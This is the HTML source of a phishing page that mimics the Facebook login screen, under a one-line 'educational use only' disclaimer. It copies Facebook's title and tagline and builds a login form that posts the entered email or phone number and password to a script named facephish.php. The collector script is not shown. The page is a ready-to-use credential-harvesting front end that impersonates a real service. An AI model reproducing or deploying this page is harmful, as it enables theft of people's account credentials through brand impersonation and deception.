A Simple Facebook Phishing Page • For educational use only • The author is not responsible for illegal misuse.
1<!DOCTYPE html>
2<html lang="en">
3<head>
4 <meta charset="UTF-8">
5 <meta http-equiv="X-UA-Compatible" content="IE=edge">
6 <meta name="viewport" content="width=device-width, initial-scale=1.0">
7 <title>Facebook - log in or sign up</title>
8 <link rel="stylesheet" href="assets/styles/default.css">
9 <link rel="stylesheet" href="assets/styles/style.css">
10 <link rel="icon" href="assets/img/facephish.png" type="image/x-icon">
11</head>
12<body>
13 <div class="login">
14 <div class="container">
15 <div class="row">
16 <div class="col-7">
17 <div class="align-center">
18 <div class="content">
19 <img src="assets/img/facephish.svg" alt="">
20 <p>
21 Connect with friends and the world<br>
22 around you on Facebook.
23 </p>
24 </div>
25 </div>
26 </div>
27 <div class="col-5 col-xs-12">
28 <div class="login-form">
29 <form action="app/facephish.php" method="post">
30 <input id="email" type="text" placeholder="Email address or phone number" name="username"><br>
31 <input id="pass" type="password" placeholder="Password" name="password"><br>
32 <button id="login-btn" type="submit">Log In</button><br>
33 <a href="#">Forgot password?</a><br>
34 <button id="create-btn" type="button">Create New Account</button><br>
35 </form>
36 </div>
37 <footer>
38 <a href="#"
39 style="font-weight: bold;
40 color: var(--black);
41 text-decoration: none;">Create a Page</a>
42 for a celebrity, band or business.
43 </footer>
44 </div>
45 </div>
46 </div>
47 </div>
48 <script src="assets/scripts/script.js"></script>
49</body>
50</html>